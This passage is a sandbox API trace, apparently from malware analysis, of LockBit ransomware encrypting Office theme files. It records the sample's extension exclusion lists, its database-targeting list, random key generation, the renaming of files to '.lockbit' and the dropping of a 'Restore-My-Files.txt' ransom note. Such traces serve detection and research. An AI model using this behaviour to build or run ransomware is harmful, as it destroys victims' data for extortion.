returned -1 [0194.277] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.278] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.lockbit") returned 85 [0194.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0194.279] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.279] malloc (_Size=0x40068) returned 0x1ff1e60 [0194.279] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=18639) returned 1 [0194.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0194.280] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0194.280] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.285] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.285] malloc (_Size=0xc0) returned 0x1fa2ed8 [0194.285] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0xc0000008 [0194.287] free (_Block=0x1fa2ed8) [0194.287] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.287] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.287] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.287] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51182f00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b32340, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x51182f00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x559e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hardcover.eftx", cAlternateFileName="HARDCO~1.EFT")) returned 1 [0194.287] lstrcmpiW (lpString1=".", lpString2="Hardcover.eftx") returned -1 [0194.287] lstrcmpiW (lpString1="..", lpString2="Hardcover.eftx") returned -1 [0194.287] PathFindExtensionW (pszPath="Hardcover.eftx") returned=".eftx" [0194.287] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.287] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.287] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.287] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.287] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.287] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.287] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.287] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.288] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.288] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.288] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.288] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.288] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.288] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.288] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.288] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.288] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.289] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.289] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Hardcover.eftx") returned 1 [0194.289] lstrcmpiW (lpString1="ntldr", lpString2="Hardcover.eftx") returned 1 [0194.289] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Hardcover.eftx") returned 1 [0194.289] lstrcmpiW (lpString1="bootsect.bak", lpString2="Hardcover.eftx") returned -1 [0194.289] lstrcmpiW (lpString1="autorun.inf", lpString2="Hardcover.eftx") returned -1 [0194.289] lstrcmpiW (lpString1="thumbs.db", lpString2="Hardcover.eftx") returned 1 [0194.289] lstrcmpiW (lpString1="iconcache.db", lpString2="Hardcover.eftx") returned 1 [0194.290] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.290] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx") returned=".eftx" [0194.290] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.290] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.290] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.290] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.290] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.290] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.290] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.290] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.290] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.290] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.291] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.291] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.291] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.291] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.291] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.291] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.291] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.291] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.lockbit") returned 90 [0194.291] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0194.292] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.293] malloc (_Size=0x40068) returned 0x1ff1e60 [0194.293] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=350689) returned 1 [0194.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0194.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.294] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.294] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0194.294] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.317] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.317] malloc (_Size=0xca) returned 0x1fa2ed8 [0194.317] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0194.604] free (_Block=0x1fa2ed8) [0194.604] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.604] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.605] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.605] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d33b000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b32340, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7d33b000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x33892, dwReserved0=0x0, dwReserved1=0x0, cFileName="Horizon.eftx", cAlternateFileName="HORIZO~1.EFT")) returned 1 [0194.605] lstrcmpiW (lpString1=".", lpString2="Horizon.eftx") returned -1 [0194.605] lstrcmpiW (lpString1="..", lpString2="Horizon.eftx") returned -1 [0194.605] PathFindExtensionW (pszPath="Horizon.eftx") returned=".eftx" [0194.605] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.605] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.605] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.605] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.605] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.605] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.605] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.605] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.605] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.605] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.606] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.606] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.606] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.606] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.606] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.606] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Horizon.eftx") returned 1 [0194.607] lstrcmpiW (lpString1="ntldr", lpString2="Horizon.eftx") returned 1 [0194.607] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Horizon.eftx") returned 1 [0194.607] lstrcmpiW (lpString1="bootsect.bak", lpString2="Horizon.eftx") returned -1 [0194.607] lstrcmpiW (lpString1="autorun.inf", lpString2="Horizon.eftx") returned -1 [0194.607] lstrcmpiW (lpString1="thumbs.db", lpString2="Horizon.eftx") returned 1 [0194.607] lstrcmpiW (lpString1="iconcache.db", lpString2="Horizon.eftx") returned 1 [0194.607] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.607] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned=".eftx" [0194.607] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.607] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.607] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.607] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.607] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.607] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.607] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.607] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.607] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.608] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.608] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.608] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.608] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.608] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.608] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.608] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.608] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.608] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.lockbit") returned 88 [0194.608] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.609] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.610] malloc (_Size=0x40068) returned 0x3df0008 [0194.610] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=211090) returned 1 [0194.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.610] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.610] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.611] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.611] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.897] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.897] malloc (_Size=0xc6) returned 0x1fa2ed8 [0194.897] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0194.904] free (_Block=0x1fa2ed8) [0194.904] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.904] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.904] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.905] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17dfbf00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b584a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x17dfbf00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x9a7a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Median.eftx", cAlternateFileName="MEDIAN~1.EFT")) returned 1 [0194.905] lstrcmpiW (lpString1=".", lpString2="Median.eftx") returned -1 [0194.905] lstrcmpiW (lpString1="..", lpString2="Median.eftx") returned -1 [0194.905] PathFindExtensionW (pszPath="Median.eftx") returned=".eftx" [0194.905] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.905] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.905] lstrcmpiW (lpString1=".mod", lpString2=".eftx") 